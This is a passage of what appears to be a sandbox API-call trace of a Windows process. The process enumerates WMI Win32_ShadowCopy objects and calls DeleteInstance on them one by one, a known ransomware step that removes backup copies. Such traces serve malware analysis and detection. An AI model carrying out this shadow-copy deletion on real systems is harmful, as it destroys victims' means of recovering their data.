[0114.442] CoTaskMemFree (pv=0x16a900) [0114.443] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0114.443] IUnknown:AddRef (This=0x1be514d0) returned 0x2 [0114.443] IWbemClassObject:Get (in: This=0x1be514d0, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0114.444] IWbemClassObject:Get (in: This=0x1be514d0, wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0114.444] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"") returned 0x53 [0114.445] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0114.445] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0114.445] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0114.445] IUnknown:Release (This=0x142498) returned 0x1 [0114.449] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be41e20) returned 0x0 [0114.449] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be41e20, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0114.450] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be41e20, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be51a60) returned 0x0 [0114.450] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be51a60, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be51a60) returned 0x0 [0114.451] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be51a60, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0114.451] WbemDefPath:IUnknown:AddRef (This=0x1be51a60) returned 0x3 [0114.451] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0114.451] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be51a60, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x1b92a160) returned 0x0 [0114.451] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b92a160, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0114.452] WbemDefPath:IUnknown:Release (This=0x1b92a160) returned 0x3 [0114.452] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0114.452] WbemDefPath:IUnknown:AddRef (This=0x1be51a60) returned 0x4 [0114.452] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be51a60, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0114.452] WbemDefPath:IUnknown:Release (This=0x1be51a60) returned 0x3 [0114.452] WbemDefPath:IUnknown:Release (This=0x1be51a60) returned 0x2 [0114.453] WbemDefPath:IUnknown:Release (This=0x1be41e20) returned 0x0 [0114.453] WbemDefPath:IUnknown:Release (This=0x1be51a60) returned 0x1 [0114.453] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0114.453] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0114.453] WbemDefPath:IUnknown:AddRef (This=0x1be51a60) returned 0x2 [0114.454] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be51a60, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be51a60) returned 0x0 [0114.454] WbemDefPath:IUnknown:Release (This=0x1be51a60) returned 0x2 [0114.454] WbemDefPath:IUnknown:Release (This=0x1be51a60) returned 0x1 [0114.455] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0114.455] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0114.455] WbemDefPath:IUnknown:AddRef (This=0x1be51a60) returned 0x2 [0114.455] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be51a60, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be51a60) returned 0x0 [0114.455] WbemDefPath:IUnknown:Release (This=0x1be51a60) returned 0x2 [0114.455] WbemDefPath:IUnknown:AddRef (This=0x1be51a60) returned 0x3 [0114.455] WbemDefPath:IWbemPath:SetText (This=0x1be51a60, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"") returned 0x0 [0114.456] WbemDefPath:IUnknown:Release (This=0x1be51a60) returned 0x2 [0114.456] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0114.456] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0114.456] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0114.458] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0114.458] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0114.458] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0114.458] IWbemClassObject:Get (in: This=0x1be514d0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0114.458] SysStringLen (param_1="root\\cimv2") returned 0xa [0114.459] IWbemClassObject:Get (in: This=0x1be514d0, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0114.459] SysStringLen (param_1="root\\cimv2") returned 0xa [0114.459] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0114.459] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0114.459] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0114.459] IWbemClassObject:Get (in: This=0x1be514d0, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0114.459] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0114.459] IWbemClassObject:Get (in: This=0x1be514d0, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0114.459] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0114.463] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be51a60, puCount=0x1c90d500 | out: puCount=0x1c90d500*=0x2) returned 0x0 [0114.463] WbemDefPath:IWbemPath:GetText (in: This=0x1be51a60, lFlags=4, puBuffLength=0x1c90d500*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d500*=0x54, pszText=0x0) returned 0x0 [0114.463] WbemDefPath:IWbemPath:GetText (in: This=0x1be51a60, lFlags=4, puBuffLength=0x1c90d500*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d500*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"") returned 0x0 [0114.463] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d450 | out: puCount=0x1c90d450*=0x2) returned 0x0 [0114.463] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d450*=0x17, pszText=0x0) returned 0x0 [0114.463] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d450*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0114.463] CoGetContextToken (in: pToken=0x1c90d2e0 | out: pToken=0x1c90d2e0) returned 0x0 [0114.463] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0114.464] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1b92e6f0) returned 0x0 [0114.464] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0114.464] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0114.464] IWbemClassObject:Get (in: This=0x1be514d0, wszName="__GENUS", lFlags=0, pVal=0x1c90d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d43c*=0, plFlavor=0x1c90d438*=0 | out: pVal=0x1c90d440*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d43c*=3, plFlavor=0x1c90d438*=64) returned 0x0 [0114.464] WbemDefPath:IWbemPath:GetText (in: This=0x1be51a60, lFlags=2, puBuffLength=0x1c90d510*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d510*=0x3d, pszText=0x0) returned 0x0 [0114.464] WbemDefPath:IWbemPath:GetText (in: This=0x1be51a60, lFlags=2, puBuffLength=0x1c90d510*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d510*=0x3d, pszText="Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"") returned 0x0 [0114.465] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{84D74FA3-DE98-47B0-806B-7C5805D67A02}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0117.137] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0117.137] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x1be52450, puReturned=0x1c90de18*=0x1) returned 0x0 [0117.140] IUnknown:QueryInterface (in: This=0x1be52450, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be52450) returned 0x0 [0117.140] IUnknown:QueryInterface (in: This=0x1be52450, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0117.140] IUnknown:QueryInterface (in: This=0x1be52450, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0117.140] IUnknown:AddRef (This=0x1be52450) returned 0x3 [0117.140] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0117.140] IUnknown:QueryInterface (in: This=0x1be52450, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be52458) returned 0x0 [0117.141] IMarshal:GetUnmarshalClass (in: This=0x1be52458, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0117.141] IUnknown:Release (This=0x1be52458) returned 0x3 [0117.141] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0117.141] IUnknown:AddRef (This=0x1be52450) returned 0x4 [0117.141] IUnknown:QueryInterface (in: This=0x1be52450, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0117.141] IUnknown:Release (This=0x1be52450) returned 0x3 [0117.141] IUnknown:Release (This=0x1be52450) returned 0x2 [0117.141] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0117.141] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0117.142] IUnknown:AddRef (This=0x1be52450) returned 0x3 [0117.142] IUnknown:QueryInterface (in: This=0x1be52450, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be52450) returned 0x0 [0117.142] IUnknown:Release (This=0x1be52450) returned 0x3 [0117.142] IUnknown:Release (This=0x1be52450) returned 0x2 [0117.142] IUnknown:Release (This=0x1be52450) returned 0x1 [0117.142] CoTaskMemFree (pv=0x16a900) [0117.142] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0117.142] IUnknown:AddRef (This=0x1be52450) returned 0x2 [0117.142] IWbemClassObject:Get (in: This=0x1be52450, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0117.143] IWbemClassObject:Get (in: This=0x1be52450, wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0117.143] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{1D028705-A254-45DE-BE10-D22FA08DBB3A}\"") returned 0x53 [0117.144] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0117.144] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0117.144] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0117.144] IUnknown:Release (This=0x142498) returned 0x1 [0117.144] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be51c20) returned 0x0 [0117.145] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be51c20, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0117.145] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be51c20, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be52a10) returned 0x0 [0117.145] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52a10, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be52a10) returned 0x0 [0117.145] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52a10, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0117.145] WbemDefPath:IUnknown:AddRef (This=0x1be52a10) returned 0x3 [0117.146] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0117.146] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52a10, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x1b92a260) returned 0x0 [0117.146] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b92a260, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0117.146] WbemDefPath:IUnknown:Release (This=0x1b92a260) returned 0x3 [0117.146] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0117.146] WbemDefPath:IUnknown:AddRef (This=0x1be52a10) returned 0x4 [0117.146] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52a10, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0117.146] WbemDefPath:IUnknown:Release (This=0x1be52a10) returned 0x3 [0117.146] WbemDefPath:IUnknown:Release (This=0x1be52a10) returned 0x2 [0117.147] WbemDefPath:IUnknown:Release (This=0x1be51c20) returned 0x0 [0117.147] WbemDefPath:IUnknown:Release (This=0x1be52a10) returned 0x1 [0117.147] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0117.147] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0117.147] WbemDefPath:IUnknown:AddRef (This=0x1be52a10) returned 0x2 [0117.147] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52a10, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be52a10) returned 0x0 [0117.147] WbemDefPath:IUnknown:Release (This=0x1be52a10) returned 0x2 [0117.147] WbemDefPath:IUnknown:Release (This=0x1be52a10) returned 0x1 [0117.147] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0117.147] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0117.147] WbemDefPath:IUnknown:AddRef (This=0x1be52a10) returned 0x2 [0117.148] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52a10, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be52a10) returned 0x0 [0117.148] WbemDefPath:IUnknown:Release (This=0x1be52a10) returned 0x2 [0117.148] WbemDefPath:IUnknown:AddRef (This=0x1be52a10) returned 